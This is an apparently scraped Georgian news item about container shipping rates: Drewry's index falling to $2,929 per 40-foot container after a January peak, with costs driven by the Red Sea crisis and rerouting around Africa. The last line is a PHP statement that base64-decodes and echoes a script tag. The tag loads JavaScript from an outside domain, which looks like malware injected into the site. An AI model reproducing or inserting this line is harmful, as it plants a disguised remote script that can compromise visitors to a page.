celsiusi
ავერსი შნაიდერი

 საკონტეინერო გადაზიდვების ფასები კლების ტენდენციას აჩვენებს.

კონტეინერების მსოფლიო ინდექსი Drewry’s 3000 დოლარის ნიშნულს ჩამოსცდა. 28 მარტის მონაცემებით ერთი 40-ფუტიანი კონტეინერის გადაზიდვის ტარიფი კიდევ 3%-ით, $2,929 -მდე შემცირდა. ეს მაჩვენებელი იანვარში დაფიქსირებულ პიკურ მაჩვენებელზე 3964 დოლარზე 1035 დოლარით, ანუ 26%-ით ნაკლებია, თუმცა ისევ მკვეთრად აღემატება 2023 წლის დეკემბერში არსებულ 1500 - დოლარიან ნიშნულს.

საკონტეინერო გადაზიდვები წითელი ზღვის კრიზისმა გააძვირა, რადგანაც გემების უმეტესობა წითელ ზღვაში შესვლას აფრიკის კონტინენტის შემოვლას ამჯობინებს. გაზრდილი მანძილი მეტ საწვავს მოითხოვს, რასაც დაზღვევის ხარჯიც ემატება. თუმცა, როგორც ჩანს, ბიზნესოპერატორებმა სუეცის არხიდან ახალ მარშრუტზე გადაწყობა სრულად შეძლეს.

309
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");